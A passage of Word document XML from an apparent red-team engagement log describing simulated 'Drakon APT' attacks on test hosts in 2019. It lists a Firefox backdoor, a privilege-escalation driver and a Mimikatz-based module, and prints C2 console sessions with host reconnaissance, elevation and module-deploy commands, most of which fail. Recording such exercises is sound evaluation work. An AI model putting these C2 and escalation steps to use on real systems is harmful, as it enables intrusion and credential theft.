    </w:p>
    <w:p w14:paraId="660D26FA" w14:textId="01B547A7" w:rsidR="00A351B2" w:rsidRPr="00BA5AEF" w:rsidRDefault="006C14C7" w:rsidP="00BA5AEF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1        128.55.12.167:56638 --&gt;   128.55.12.167:8102  [HTTP]  Thu May  9 1</w:t>
      </w:r>
      <w:r w:rsidR="00BA5AEF">
        <w:t>3:43:10 2019        active 744s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415866A" w14:textId="663AD2D5" w:rsidR="00A351B2" w:rsidRPr="00BA5AEF" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc12600023"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>13:57 -- TA1 MARPLE 1 -- Firefox Drakon APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="7FE11DEA" w14:textId="38B51C03" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The next attack was against the MARPLE 1 host.  This attack was the Drakon APT using the same url that was used against the Five Directions windows host, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5AEF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>www.usdoj.gov</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">.  loaderDrakon was executed in Firefox memory and connected out to 150.159.104.124:80 and 19.49.27.211:80 for C2.  Failed to use elevate driver as driver signing seemed to be enabled again after a reboot.  Sysinfo module failed and might not be fully supported on Windows 7.Gethostname, getusername, and GetCurrentProcessid were commands sent from the C2 to gather intel during the attack.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45176FE8" w14:textId="1D0BE1AA" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_a09npikb7jzt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="57" w:name="_Toc12600024"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="2F2CE3EF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-marple-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.66</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Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68311AB1" w14:textId="1181E38D" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_tlmvo8jrkse7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="59" w:name="_Toc12600025"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="3ED9F475"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Firefox 54.0.1 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A840585"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Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D49110"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Elevate driver (Perfmon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CDF32D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Failed, driver signing was not disabled after reboot during engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F6A917"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Copykatz module (Mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C1A37D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Didn’t get a chance to run since privilege escalation failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A99480"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Sysinfo module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2E524" w14:textId="71D55ACC" w:rsidR="00A351B2" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1BC1CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc12600026"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="15E6CAF7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52051203" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Benign activity browsed to www.usdoj.gov</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790E458" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C94C2FB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/projects/drakon-apt/oc2$ sudo python ocMain.py --http 8102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72090E2B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[sudo] password for kududyn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6071728B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B442020" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F915F76" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07082B2E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D3A2F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8102  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DF8EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C23DD30" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E957B9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D73385" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE02A97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CEC250" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B016C19" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [W2] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309CF0A5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC8C3A2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405E197" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC1921" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W2        128.55.12.167:56648 --&gt;   128.55.12.167:8102  [HTTP]  Thu May  9 13:57:31 2019        active 17s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CAE1A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1        128.55.12.167:56638 --&gt;   128.55.12.167:8102  [HTTP]  Thu May  9 13:43:10 2019        active 878s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFEE3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33238F59" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F2677" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>W2&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB39AF7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-marple-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584CD9C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W2&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174AD433" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB7182" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W2&gt;getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE5EEC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] pid: 3332</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C3D48" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2917B9D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E40456B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W2&gt;elevatepid '\\.\sysmon' 3332</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B3E014" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate process [\\.\sysmon] [3332]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A840AC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate failed with status -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C5E56C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Did you install the elevate driver before running the elevate command?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FF1909" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2570159C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F9C302" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W2&gt;module sysinfo /e5/deploy/sysinfo.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB0C8E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DD5B7B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0B6ADB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W2&gt;module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0F1FFB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +---------+------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484AEAE0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] |   name  | library                            | deployed |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D21759A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +---------+------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A99A2C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] | sysinfo | /e5/deploy/sysinfo.windows.x64.dll |    0     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108C3BF7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +---------+------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE52C1F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W2&gt;deploy sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DAA6B5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Loading module /e5/deploy/sysinfo.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A5AED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] deploy success [sysinfo] [/e5/deploy/sysinfo.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF0287" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED0B303" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177035E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W2&gt;ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CFF6FE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>No response (sysinfo failed to deploy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33434A96" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37912DF1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C3B09" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>^C[-] Connection lost for console [W1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF53CA3" w14:textId="05941203" w:rsidR="006C14C7" w:rsidRPr="00BA5AEF" w:rsidRDefault="006C14C7" w:rsidP="00BA5AEF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[-] C</w:t>
      </w:r>
      <w:r w:rsidR="00BA5AEF">
        <w:t>onnection lost for console [W2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D266D" w14:textId="587367D1" w:rsidR="00A351B2" w:rsidRPr="00BA5AEF" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc12600027"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>14:35 -- TA5.2 Ubuntu 1 -- Firefox Drakon APT Elevate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="62914292" w14:textId="57C202E8" w:rsidR="00CE2C66" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="00CE2C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>TA5.2 was also a target for the Firefox Drakon APT simulacrum on this day.  Once the connection was established the same commands run under windows were issued, Gethostname, getusername, and GetCurrentProcessid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A766C8" w14:textId="2F9BDB0E" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc12600028"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="2C1EDE79" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta52-ubuntu-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
